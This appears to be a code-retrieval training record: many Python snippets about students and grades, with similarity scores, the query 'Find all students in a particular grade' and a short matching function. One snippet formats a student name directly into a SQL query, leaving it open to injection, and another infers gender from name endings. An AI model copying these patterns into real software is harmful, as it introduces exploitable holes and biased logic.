<a> elements on the page which link to a school page\n\ta_elems = schools_tree.xpath(path, namespaces={'re':ns})\n\tbase_url = \"http://www.gla.ac.uk\"\n\turls = []\n\tnames = []\n\n\tfor a in a_elems:\n\t\t# make school staff page url\n\t\tstaff_page_url = base_url + a.get(\"href\") + \"staff/\"\n\t\turls.append(staff_page_url)\n\t\t# get name of school\n\t\tschool_name = a.text\n\t\tnames.append(school_name)\n\n\t# create list of tuples\n\tschool_names_urls = zip(names, urls)\n\treturn school_names_urls", "def get_eval_list(assessment, current_user):\n for team in Team.objects.all():\n if current_user in team.student.all() and team.course == assessment.course: # get the team\n evaluated_list = [student for student in team.student.all() if student != current_user]\n return evaluated_list", "def get_all_by_gender(students, gender):\n if gender == \"female\":\n gender_list = [student for student in students if student[1].endswith(\"a\")]\n return gender_list\n elif gender == \"male\":\n male_list = []\n for counter, student in enumerate(students):\n if student[1].endswith(\"a\"):\n pass\n else: \n male_list.append(students[counter])\n return male_list\n\n else:\n raise ValueError('Wrong gender')", "def get_student_grade(class_id):\n grades = []\n quiz_grade = query_db(\n \"SELECT quizzes.name, grade FROM quiz_grades JOIN quizzes \"\n \"ON quiz_grades.quiz_id=quizzes.id JOIN topics \"\n \"ON quizzes.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id \"\n \"WHERE student_id=? AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in quiz_grade:\n student_grade_quiz = {}\n student_grade_quiz[\"thing_name\"] = grade[0]\n student_grade_quiz[\"grade\"] = grade[1]\n grades.append(student_grade_quiz)\n assignment_grade = query_db(\n \"SELECT assignments.name, grade FROM assignment_grades \"\n \"JOIN assignments ON assignment_grades.assignment_id=assignments.id \"\n \"JOIN topics on assignments.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE student_id=? \"\n \"AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in assignment_grade:\n student_grade_assignment = {}\n student_grade_assignment[\"thing_name\"] = grade[0]\n student_grade_assignment[\"grade\"] = grade[1]\n grades.append(student_grade_assignment)\n return grades", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n # a list of (project_title, grade) for a given student\n titles_grades = hackbright.get_grades_by_github(github)\n\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n titles_grades=titles_grades)\n\n return html", "def pickallstudents():\n studlen = len(students)\n choicenum = 1\n while choicenum < (studlen + 1):\n pick = random.choice(students)\n students.remove(pick)\n pickedstudents.append(pick)\n print(f'#{choicenum} {pick}')\n choicenum = choicenum + 1", "def getGrades(self, student):\n try:\n return self.grades[student.getIDNumber()][:]\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def searchByYear(database):\n year=int(input(\"What is his year of study :\"))\n usrs,find=getByYear(database,year)\n for usr in usrs:\n print(usr)", "def filter_courses(original_courses_list, year, upper_bound, lower_bound, semester):\n filtered_courses_list = []\n\n for course in original_courses_list:\n if year is not None and course.year != year:\n continue\n if upper_bound is not None and course.grade > upper_bound:\n continue\n if lower_bound is not None and course.grade < lower_bound:\n continue\n if semester is not None and course.semester != semester:\n continue\n filtered_courses_list.append(course)\n\n return filtered_courses_list", "def __ui_search_student_by_id(self, search):\n try:\n result = self.__student_controller.search_by_id(search)\n for student in result:\n print(str(student))\n\n except RepositoryException as re:\n print(re)\n return", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n project_list = hackbright.get_grades_by_github(github)\n\n\n return render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n project_list=project_list)", "def get_student_classes():\n class_data = query_db(\n \"SELECT classes.id, classes.name FROM classes JOIN roster \"\n \"ON roster.class_id = classes.id where people_id=?;\",\n [flask.session[\"id\"]],\n )\n classes = []\n for class_info in class_data:\n student_class = {}\n student_class[\"id\"] = class_info[0]\n student_class[\"name\"] = class_info[1]\n classes.append(student_class)\n return classes", "def get_and_clean_student_list(students):\r\n\r\n students = split_by_comma_and_whitespace(students)\r\n students = [unicode(s.strip()) for s in students]\r\n students = [s for s in students if s != '']\r\n students_lc = [x.lower() for x in students]\r\n\r\n return students, students_lc", "def getGrades(self, student):\n try: #return copy of list of student's grades\"\"\"\n return self.grades[student.getIdNum()][:]\n except:\n raise ValueError('Student not in mapping')", "def students_data():\n\n return [\n {'name': 'Alexey', 'rate': 2, 'course': 'Python'},\n {'name': 'Vali', 'rate': 5, 'course': 'Java'},\n {'name': 'Olga', 'rate': 4, 'course': 'Python'},\n {'name': 'Frank', 'rate': 5, 'course': 'Python'},\n {'name': 'Masha', 'rate': 3, 'course': 'Java'},\n {'name': 'Vasily', 'rate': 2, 'course': 'Java'},\n {'name': 'Daria', 'rate': 3, 'course': 'Python'},\n {'name': 'Nickname', 'rate': 4, 'course': 'Python'},\n {'name': 'Fort', 'rate': 3, 'course': 'Java'},\n {'name': 'Lama', 'rate': 4, 'course': 'Java'},\n {'name': 'Pop', 'rate': 2, 'course': 'Python'},\n {'name': 'Sort', 'rate': 3, 'course': 'Python'},\n {'name': 'Elya', 'rate': 5, 'course': 'Java'},\n {'name': 'Tolik', 'rate': 4, 'course': 'Python'},\n ]", "def browse_students(request):\n students = Student.objects.filter(current_mentor=None)\\\n .exclude(Q(status='drop-out') | Q(status='unresponsive') | Q(status='retainer')\n | Q(status='alum') | Q(status='paused'))\n return render(request, 'match/browse_students.html', {'students': students})", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n title_grade_list = hackbright.get_grades_by_github(github)\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n title_grade_list=title_grade_list)\n\n return html", "def Students_in_majors(l:list,i:list)->list:\n result=[]\n for s in l:\n if s.major in i:\n result.append(s)\n return result", "def delete_all_students(connection):\r\n with connection:\r\n return connection.execute(DELETE_ALL_STUDENTS)", "def get_results(self, stud_name):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\n \"SELECT c.naam, e.cijfer, e.ex_datum \"\n \"FROM studenten s \"\n \"INNER JOIN examens e ON e.stud_id = s.stud_id \"\n \"INNER JOIN cursussen c ON c.cur_id = e.cur_id WHERE s.naam = '{0}' \"\n \"ORDER BY e.ex_datum DESC\".format(stud_name))\n self.cur.close()\n\n return self.cur.fetchall()", "def student_pins_in_semester(cls, student: Student, semester: Semester) -> Iterable[Group]:\n pins = cls.objects.filter(\n group__course__semester_id=semester.pk, student_id=student.pk).select_related(\n 'group__course', 'group__teacher', 'group__teacher__user')\n return map(lambda p: p.group, pins)", "def test_get_students_for_contact(self):\n pass", "def set_of_courses(students_list: list) -> set:\n return set(student['course'] for student in students_list)", "def list(self, request):\n queryset = Students.objects.filter(average_rating=5.0)\n students = normalize_students(queryset)\n return Response(students)", "def make_students_list():\n students_data_list = generate_list_from_txt(\"students.txt\")\n students_list = extract_first_element(students_data_list)\n return students_list", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n grades = hackbright.get_grades_by_github(github)\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n grades=grades)\n\n return html", "def top_students(grade_book, num_students=3):\n return sorted(grade_book, key=grade_book.get, reverse=True)[:num_students]", "def __ui_list_students(self):\n try:\n print(str(self.__student_controller))\n except RepositoryException as re:\n print(re)\n return", "def test_no_other_school_years(self):\n user = self.make_user()\n SchoolYearFactory()\n\n with self.login(user):\n self.get_check_200(\"reports:index\")\n\n assert list(self.get_context(\"school_years\")) == []", "def search_student(student):\n result=[]\n for name,age in alumnos.items():\n if student.lower() in name.lower():\n result.append(name)\n\n print(f\"Result {result}\")\n return result", "def get_all_allowed_enrollments(self):\n if self.is_superuser:\n return Enrollment.objects.all()\n\n # Enrollments belonging to students the user manages\n manages = Q(student__case_manager=self)\n # Enrollments belonging to sections the user teaches\n teaches = Q(section__teacher=self)\n\n # Filter all terms which the user teaches a class\n taught_terms = Term.objects.filter(section__teacher=self)\n\n # The teacher of another section in the same term in which the student is enrolled\n other_teacher = Q(pk__in=[])\n for term in taught_terms:\n overlapping_terms = term.get_overlapping_terms()\n # Get all sections from this term or its overlaps\n term_sections = Section.objects.filter(term__in=overlapping_terms)\n # Get all the enrollments in any section from this term\n term_enrollments = Enrollment.objects.filter(section__in=term_sections)\n # Get all the students taught by this user this term\n term_taught_students = Student.objects.filter(enrollment__in=term_enrollments.filter(section__teacher=self))\n # Get all the enrollments of those students for this term\n other_teacher = other_teacher | Q(student__in=term_taught_students, section__term__in=overlapping_terms)\n return Enrollment.objects.filter(teaches | manages | other_teacher).distinct()", "def get_grade(self, student_id):\r\n row = self.grades.get(student_id, [])\r\n ncomp = len(self.components)\r\n return [row.get(comp, None) for comp in range(ncomp)]", "def gr_s(gr):\r\n c.execute(\"SELECT * FROM personnel WHERE grade=:grade COLLATE NOCASE\", {'grade': gr})\r\n return c.fetchall()" ]
[ "0.76901233", "0.66902846", "0.65749806", "0.6472811", "0.64696026", "0.64033043", "0.63738966", "0.6277681", "0.62386876", "0.6223855", "0.6206561", "0.6142386", "0.61358625", "0.6032616", "0.6021176", "0.6009096", "0.5954611", "0.59262055", "0.59205323", "0.58794457", "0.58733386", "0.5850076", "0.57891273", "0.57453907", "0.57231045", "0.5717755", "0.57169706", "0.57159585", "0.5649871", "0.5633285", "0.561114", "0.56032526", "0.55238307", "0.5520008", "0.5511149", "0.5464064", "0.54371864", "0.5431545", "0.5412006", "0.53792197", "0.536918", "0.5342742", "0.5340107", "0.53318447", "0.5312373", "0.53081167", "0.5293116", "0.52666014", "0.526523", "0.5258975", "0.52423793", "0.5231378", "0.5228281", "0.522269", "0.52111393", "0.52102685", "0.5203732", "0.5199187", "0.5191569", "0.5182839", "0.5166292", "0.51654196", "0.51594615", "0.5155998", "0.51502407", "0.514863", "0.51410687", "0.5131697", "0.5131627", "0.511872", "0.5117872", "0.509651", "0.5095825", "0.508961", "0.50893444", "0.50847656", "0.5082722", "0.5080713", "0.5075901", "0.5064273", "0.5054334", "0.50492513", "0.5016618", "0.50047064", "0.50043213", "0.4989964", "0.49802378", "0.49611363", "0.49557397", "0.49510467", "0.49482134", "0.49456936", "0.49277157", "0.49248356", "0.49217528", "0.49194202", "0.49188057", "0.4912249", "0.4903743", "0.48954493" ]
0.5828101
22
Find all students in a particular grade.
def grade(self, grade_number: int): return self.students.setdefault(grade_number, [])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def students(self):\n\t\treturn self.grade_set.all().distinct()", "def find_students(self):\n from quizzer.models.attendance import Attendance\n from quizzer.models.semester import Semester\n\n semester = Semester.get_current()\n\n for attendance in Attendance.objects: # TODO: Use indexed query later.\n if attendance.semester == semester and attendance.class_ == self:\n yield attendance.student", "def __ui_list_grades_by_student(self):\n student_id = input(\"Give student ID: \")\n try:\n list_of_grades = self.__grade_controller.get_grades_by_student(student_id)\n if len(list_of_grades) == 0:\n print(\"Student doesn't have any grade.\")\n return\n\n for g in list_of_grades:\n print(str(g))\n\n except GradeException as ge:\n print(ge)\n return", "def all_students(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for student in all_students:\n print(student)", "def get_list_of_students(self):\n return self._students", "def get_all_failing_students(self):\n students = MyCollection()\n for student in self.__student_repository.get_all():\n failing = False\n for grade in self.__grade_repository.get_all():\n if \".\" + str(student.entity_id) in grade.entity_id and grade.grade_value < 5:\n failing = True\n if failing:\n students.append(student)\n return students", "def get_grades(self, student):\n try:\n return self.grades[student.id][:] # notice that a copy is returned\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def get_students(self) -> List['Student']:\n return self.students.values()", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.StudentId,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.CohortId\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n for student in all_students:\n print(student)", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n for student in all_students:\n print(student)", "def query_all():\n\tstudents = session.query(Student).all()\n\treturn students", "def get_all_by_student(self, stud_id):\n l = []\n for item in self._items:\n if item.get_student() == stud_id:\n l.append(item)\n return l[:]", "def get_students(self):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\"SELECT * FROM studenten\")\n self.cur.close()\n\n return self.cur.fetchall()", "def get_student_grade(class_id):\n grades = []\n quiz_grade = query_db(\n \"SELECT quizzes.name, grade FROM quiz_grades JOIN quizzes \"\n \"ON quiz_grades.quiz_id=quizzes.id JOIN topics \"\n \"ON quizzes.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id \"\n \"WHERE student_id=? AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in quiz_grade:\n student_grade_quiz = {}\n student_grade_quiz[\"thing_name\"] = grade[0]\n student_grade_quiz[\"grade\"] = grade[1]\n grades.append(student_grade_quiz)\n assignment_grade = query_db(\n \"SELECT assignments.name, grade FROM assignment_grades \"\n \"JOIN assignments ON assignment_grades.assignment_id=assignments.id \"\n \"JOIN topics on assignments.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE student_id=? \"\n \"AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in assignment_grade:\n student_grade_assignment = {}\n student_grade_assignment[\"thing_name\"] = grade[0]\n student_grade_assignment[\"grade\"] = grade[1]\n grades.append(student_grade_assignment)\n return grades", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.first_name,\n s.Last_name,\n s.slack_handle,\n s.cohort_id,\n c.name\n from students s\n join cohorts c on s.cohort_id = c.id\n order by s.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Students***')\n\n for student in all_students:\n print(student)", "def main():\n given_scores = []\n num_grades = int(raw_input())\n for i in xrange(num_grades):\n given_scores.append(int(raw_input()))\n for score in grading_students(given_scores):\n print score", "def add_student(self, name: str, grade: int) -> None:\n school_grade = self.students.setdefault(grade, [])\n school_grade.append(name)\n school_grade.sort()", "def get_all_allowed_students(self):\n if self.is_superuser:\n return Student.objects.all()\n\n # Students who this user manages\n manages = Q(case_manager=self)\n # Students in a class this user teaches\n teaches = Q(enrollment__section__teacher=self)\n\n valid_students = Student.objects.filter(teaches | manages)\n return valid_students", "def getGrades(self,student):\n try:\n return self.grades[student.getIdNum()][:]\n except KeyError:\n raise ValueError('Student not in grade book')", "def get_grade_by_student(first_name):\n\n QUERY = \"\"\"\n SELECT g.project_title, g.grade \n FROM Students AS s JOIN Grades AS g \n ON s.github = g.student_github\n WHERE s.first_name = ?\n \"\"\"\n\n db_cursor.execute(QUERY, (first_name,))\n row = db_cursor.fetchall()\n \n if row != []:\n for project in row:\n print 'Grade for %s: %s' %(project[0], project[1])\n else:\n print 'Please try again and enter a FIRST NAME'", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def get_grade(self, student_id):\r\n row = self.grades.get(student_id, [])\r\n ncomp = len(self.components)\r\n return [row.get(comp, None) for comp in range(ncomp)]", "def get_grade_entries(user, assignments_map, students_map):\n grade_entries = GradeEntry.query(ancestor=get_parent_key(user)).fetch()\n for grade_entry in grade_entries:\n grade_entry.assignment = assignments_map[grade_entry.assignment_key]\n grade_entry.student = students_map[grade_entry.student_key]\n return grade_entries", "def get_campus_students(session, school):\n # Parameter to avoid getting staff users\n parameters = {'filter[staff?]': False}\n users = get_all_pages(session, f'/campus/{school}/users', 100, params=parameters)\n ids = []\n\n for user in users:\n # Check that the user is not anonymized by checking first letters of login\n if not user['login'].startswith('3b3-'):\n ids.append(user['id'])\n\n return ids", "async def get_grades(\n self, last_sync: datetime = None, deleted=False, **kwargs\n ) -> Union[AsyncIterator[Grade], List[int]]:\n return Grade.get(self._api, last_sync, deleted, **kwargs)", "def allStudents(self):\n if not self.isSorted:\n self.students.sort()\n self.isSorted=True\n #return copy of list of students\n for s in self.students:\n yield s", "def select_all_from_students_db(connection):\r\n with connection:\r\n r = connection.execute(GET_ALL_STUDENTS)\r\n return r.fetchall()", "def getGrades(self, student):\n try:\n return self.grades[student.getIDNumber()][:]\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def getGrades(self, student):\n try: #return copy of list of student's grades\"\"\"\n return self.grades[student.getIdNum()][:]\n except:\n raise ValueError('Student not in mapping')", "def see_course_students(self, username: str, token: str, course_abbreviation: str) -> List[Tuple[str, float]]:\n\n # Validate user first\n if not self.validate(username=username, token=token, check_privilege='instructor'):\n raise RuntimeError(\"User not verified!\")\n\n # Get a DB cursor\n cursor = self._db_connection.cursor()\n\n # Get the course ID from the abbreviation\n cursor.execute('''\n SELECT course_id FROM courses WHERE course_abbreviation LIKE ?;\n ''', (course_abbreviation,))\n db_result = cursor.fetchone()\n\n # If no associated courses are found\n if db_result is None:\n RuntimeError(f\"Could not find course associated with: {course_abbreviation}\")\n\n # Extract the course ID from the returned tuple\n course_id = db_result[0]\n\n # Query database for all courses\n cursor.execute(\n '''\n SELECT \n uid,\n grade\n FROM \n enrollment_records\n WHERE\n course_id = ?\n ;\n ''', (course_id,))\n db_results = cursor.fetchall()\n\n # If no courses are available\n if db_results is None or len(db_results) == 0:\n return []\n\n # Build information dicts for every student enrolled in this course\n students = []\n for result in db_results:\n # Get the student's username (we don't want to be giving UIDs)\n student_name = self.get_username(result[0])\n\n # Build a course dict from the data\n students.append({\n \"name\": student_name,\n \"grade\": float(result[1])\n })\n\n # Return list of student info dictionaries\n return students", "def get_student(self, **fields):\n existing_fields = [i.name for i in self._db.get_columns('students')]\n student_fields = {}\n for key, value in fields.items():\n if key in existing_fields:\n student_fields[key] = value\n additional_fields = ['parent_UID', 'parent_key'] # Additional fields that could be passed in args\n parent_fields = {}\n group_key = None\n for key, value in fields.items():\n if key == 'group_key':\n group_key = value\n if key in additional_fields:\n if key == 'parent_UID':\n parent_fields['UID'] = value\n else:\n parent_fields[key] = value\n parent = None if len(parent_fields) == 0 else Parents.get_or_none(**parent_fields)\n query = Students.select().filter(**student_fields)\n if group_key is not None:\n query = query.join(StudentsGroups).join(Groups).where(Groups.group_key == group_key)\n if parent is not None:\n query = query.where(Students.parent == parent)\n students = [i for i in query]\n # Expect single value if search by unique fields, list if by non-unique or by parent\n return students if len(students) > 1 else students[0] if len(students) == 1 else None", "def get_all_by_gender(students, gender):\n if gender == \"female\":\n gender_list = [student for student in students if student[1].endswith(\"a\")]\n return gender_list\n elif gender == \"male\":\n male_list = []\n for counter, student in enumerate(students):\n if student[1].endswith(\"a\"):\n pass\n else: \n male_list.append(students[counter])\n return male_list\n\n else:\n raise ValueError('Wrong gender')", "def get_students_of_class(students, class_name):\n for row in students:\n class_list = [row for row in students if row[4]== class_name]\n return class_list", "def get_students(\n self,\n gradebook_id='',\n simple=False,\n section_name='',\n include_photo=False,\n include_grade_info=False,\n include_grade_history=False,\n include_makeup_grades=False\n ):\n # These are parameters required for the remote API call, so\n # there aren't too many arguments, or too many variables\n # pylint: disable=too-many-arguments,too-many-locals\n\n # Set params by arguments\n params = dict(\n includePhoto=json.dumps(include_photo),\n includeGradeInfo=json.dumps(include_grade_info),\n includeGradeHistory=json.dumps(include_grade_history),\n includeMakeupGrades=json.dumps(include_makeup_grades),\n )\n\n url = 'students/{gradebookId}'\n if section_name:\n group_id, _ = self.get_section_by_name(section_name)\n if group_id is None:\n failure_message = (\n 'in get_students -- Error: '\n 'No such section %s' % section_name\n )\n log.critical(failure_message)\n raise PyLmodNoSuchSection(failure_message)\n url += '/section/{0}'.format(group_id)\n\n student_data = self.get(\n url.format(\n gradebookId=gradebook_id or self.gradebook_id\n ),\n params=params,\n )\n\n if simple:\n # just return dict with keys email, name, section\n student_map = dict(\n accountEmail='email',\n displayName='name',\n section='section'\n )\n\n def remap(students):\n \"\"\"Convert mit.edu domain to upper-case for student emails.\n\n The mit.edu domain for user email must be upper-case,\n i.e. MIT.EDU.\n\n Args:\n students (list): list of students\n\n Returns:\n dict: dictionary of updated student email domains\n \"\"\"\n newx = dict((student_map[k], students[k]) for k in student_map)\n # match certs\n newx['email'] = newx['email'].replace('@mit.edu', '@MIT.EDU')\n return newx\n\n return [remap(x) for x in student_data['data']]\n\n return student_data['data']", "def get_students(self):\n if not self.is_sorted:\n self.students.sort()\n self.is_sorted = True\n for s in self.students:\n yield s", "def get_all_grades(first_name, last_name):\n QUERY = \"\"\" SELECT s.first_name, s.last_name, g.project_title, g.grade \n FROM Students AS s \n INNER JOIN Grades AS g ON s.github = g.student_github\n WHERE s.first_name = ? AND s.last_name = ? \"\"\"\n db_cursor.execute(QUERY, (first_name, last_name))\n grades_data = db_cursor.fetchone()\n print grades_data[-1]", "def students(self):\n return self._parser.students", "def __ui_search_student_by_name(self, search):\n try:\n result = self.__student_controller.search_by_name(search)\n for student in result:\n print(str(student))\n\n except RepositoryException as re:\n print(re)\n return", "def roster(self) -> list:\n return [student\n for grade in sorted(self.students)\n for student in self.students[grade]]", "def allStudents(self):\n if not self.isSorted:\n self.students.sort()\n self.isSorted = True\n # Returns each element or each student in order, as needed.\n for student in self.students:\n yield student", "def get_all_enrolled(self, discipline_id):\n students = MyCollection()\n for item in self.__student_repository.get_all():\n newID = str(discipline_id) + \".\" + str(item.entity_id)\n if not self.__link_repository.find_by_id(newID) is None:\n students.append(item)\n return students", "def get_students(self):\n dist_on_foot = db.session.query(Activity.user_id.label('user_id'),\n func.sum(Activity.distance).label('on_foot')). \\\n filter(func.date(Activity.datetime) >= self.SEASON.start_date,\n func.date(Activity.datetime) <= self.SEASON.end_date,\n Activity.type.in_([ActivityType.Run, ActivityType.Walk])). \\\n group_by(Activity.user_id). \\\n subquery(with_labels=True)\n dist_on_bike = db.session.query(Activity.user_id.label('user_id'),\n func.sum(Activity.distance).label('on_bike')). \\\n filter(func.date(Activity.datetime) >= self.SEASON.start_date,\n func.date(Activity.datetime) <= self.SEASON.end_date,\n Activity.type.in_([ActivityType.Ride])). \\\n group_by(Activity.user_id). \\\n subquery(with_labels=True)\n data = db.session.query(User, dist_on_foot.c.on_foot, dist_on_bike.c.on_bike). \\\n select_from(User). \\\n outerjoin(dist_on_foot, User.id == dist_on_foot.c.user_id). \\\n outerjoin(dist_on_bike, User.id == dist_on_bike.c.user_id). \\\n filter(User.type == UserType.Student). \\\n order_by(User.last_name.asc(), User.first_name.asc())\n\n result = []\n for row in data:\n on_foot = row.on_foot or 0\n on_bike = row.on_bike or 0\n item = {\n 'name': row.User.first_name + ' ' + row.User.last_name,\n 'uk id': row.User.uk_id,\n 'on foot': round(on_foot, 1),\n 'on bike': round(on_bike, 1),\n 'points': round(on_foot + on_bike / 2, 2)\n }\n result.append(item)\n return result", "def test_empty_student_list(self):\r\n gradeset_results = list(iterate_grades_for(self.course.id, []))\r\n self.assertEqual(gradeset_results, [])", "def get_student_grade_summary_data(request, course, get_grades=True, get_raw_scores=False, use_offline=False):\r\n course_key = course.id\r\n enrolled_students = User.objects.filter(\r\n courseenrollment__course_id=course_key,\r\n courseenrollment__is_active=1,\r\n ).prefetch_related(\"groups\").order_by('username')\r\n\r\n header = [_('ID'), _('Username'), _('Full Name'), _('edX email'), _('External email')]\r\n\r\n datatable = {'header': header, 'students': enrolled_students}\r\n data = []\r\n\r\n gtab = GradeTable()\r\n\r\n for student in enrolled_students:\r\n datarow = [student.id, student.username, student.profile.name, student.email]\r\n try:\r\n datarow.append(student.externalauthmap.external_email)\r\n except: # ExternalAuthMap.DoesNotExist\r\n datarow.append('')\r\n\r\n if get_grades:\r\n gradeset = student_grades(student, request, course, keep_raw_scores=get_raw_scores, use_offline=use_offline)\r\n log.debug('student={0}, gradeset={1}'.format(student, gradeset))\r\n with gtab.add_row(student.id) as add_grade:\r\n if get_raw_scores:\r\n # TODO (ichuang) encode Score as dict instead of as list, so score[0] -> score['earned']\r\n for score in gradeset['raw_scores']:\r\n add_grade(score.section, getattr(score, 'earned', score[0]))\r\n else:\r\n for grade_item in gradeset['section_breakdown']:\r\n add_grade(grade_item['label'], grade_item['percent'])\r\n student.grades = gtab.get_grade(student.id)\r\n\r\n data.append(datarow)\r\n\r\n # if getting grades, need to do a second pass, and add grades to each datarow;\r\n # on the first pass we don't know all the graded components\r\n if get_grades:\r\n for datarow in data:\r\n # get grades for student\r\n sgrades = gtab.get_grade(datarow[0])\r\n datarow += sgrades\r\n\r\n # get graded components and add to table header\r\n assignments = gtab.get_graded_components()\r\n header += assignments\r\n datatable['assignments'] = assignments\r\n\r\n datatable['data'] = data\r\n return datatable", "def get_sorted_students(self):\n results = self.__create_student_and_grade_dto()\n results.sort(self.__compare_dtos_on_grade)\n return results", "def __ui_search_student_by_id(self, search):\n try:\n result = self.__student_controller.search_by_id(search)\n for student in result:\n print(str(student))\n\n except RepositoryException as re:\n print(re)\n return", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n # a list of (project_title, grade) for a given student\n titles_grades = hackbright.get_grades_by_github(github)\n\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n titles_grades=titles_grades)\n\n return html", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n rows = hackbright.get_grades_by_github(github)\n\n\n return render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n rows=rows)\n # return html", "def test_only_students_courses(self):\n user = self.make_user()\n enrollment = EnrollmentFactory(grade_level__school_year__school=user.school)\n course = CourseFactory(grade_levels=[enrollment.grade_level])\n grade = GradeFactory(\n score=50,\n student=enrollment.student,\n graded_work__course_task__course=course,\n )\n grade_2 = GradeFactory(\n score=100,\n student=enrollment.student,\n graded_work__course_task__course=course,\n )\n GradeFactory(\n graded_work__course_task__course__grade_levels=[enrollment.grade_level]\n )\n\n with self.login(user):\n self.get_check_200(\"reports:progress\", pk=enrollment.id)\n\n assert self.get_context(\"courses\") == [\n {\n \"course\": grade.graded_work.course_task.course,\n \"grades\": [grade, grade_2],\n \"course_average\": 75,\n }\n ]", "def add_grade(self, student, grade):\n try:\n self.grades[student.id].append(grade)\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def addGrade(self, student, grade):\n try:\n self.grades[student.getIDNumber()].append(grade)\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def get_students(user):\n students = Student.query(ancestor=get_parent_key(user)).order(Student.rose_username).fetch()\n students_map = {}\n teams = []\n for student in students:\n students_map[student.key] = student\n if student.team not in teams:\n teams.append(student.team)\n return students, students_map, teams", "def select_all_students(conn):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM student\")\n\n rows = cur.fetchall()\n\n return rows # return the rows", "def get_all_students(hospital_codes, results_codes):\n data = pd.read_csv(\"res/Internship Lottery_April 8, 2018_11.54_correct encoding.csv\", encoding='iso-8859-8')\n students = []\n for i in range(2, 241):\n student = get_student(i + 2, data.iloc[i], hospital_codes, results_codes)\n if student is not None:\n students.append(student)\n\n return students", "def print_grades(grades_input):\n for grade in grades_input:\n print grade", "def search_student(student):\n result=[]\n for name,age in alumnos.items():\n if student.lower() in name.lower():\n result.append(name)\n\n print(f\"Result {result}\")\n return result", "def pass_assign_for_student(cls):\n today = datetime.date.today()\n assignments_list = Assignment.query.filter(Assignment.START_DATA <= today).all()\n return assignments_list", "def getStudents(self):\n if not self.isSorted:\n self.students.sort()\n self.isSorted = True\n return self.students[:] #return copy of list of students", "def gr_s(gr):\r\n c.execute(\"SELECT * FROM personnel WHERE grade=:grade COLLATE NOCASE\", {'grade': gr})\r\n return c.fetchall()", "def student_pins_in_semester(cls, student: Student, semester: Semester) -> Iterable[Group]:\n pins = cls.objects.filter(\n group__course__semester_id=semester.pk, student_id=student.pk).select_related(\n 'group__course', 'group__teacher', 'group__teacher__user')\n return map(lambda p: p.group, pins)", "def get_matching_pay_grades(self, role, **kwargs):\n return super(KitchenPayGradeManager, self).get_matching_pay_grades(\n **kwargs).filter(role=role)", "def get_average_grade_of_students(students):\n total_grade = 0\n for row in students:\n total_grade += int(row[5])\n return total_grade/len(students)", "def add_grades(self, request, pk=None):\n\n instance = self.get_object()\n try:\n user = self.request.user\n query = models.StudentSubject.objects.filter(\n subject__teacher__user=user,\n 